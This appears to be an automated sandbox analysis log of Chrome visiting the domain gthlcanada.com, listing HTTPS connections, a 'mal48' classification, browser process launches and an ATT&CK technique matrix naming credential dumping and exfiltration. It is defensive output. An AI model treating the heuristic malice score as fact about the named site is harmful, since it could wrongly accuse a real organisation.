Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 176.53.147.97:443 -> 192.168.11.20:49876 version: TLS 1.2
Source: unknownHTTPS traffic detected: 176.53.147.97:443 -> 192.168.11.20:49923 version: TLS 1.2
Source: classification engineClassification label: mal48.win@24/359@81/30
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\scoped_dir6892_874041633Jump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2228,i,10958599467247571731,13053128540631272863,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2256 /prefetch:3
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://gthlcanada.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2228,i,10958599467247571731,13053128540631272863,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2256 /prefetch:3Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\scoped_dir6892_874041633Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\chrome_BITS_6892_1078503199Jump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
2
Masquerading
OS Credential Dumping1
Network Service Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
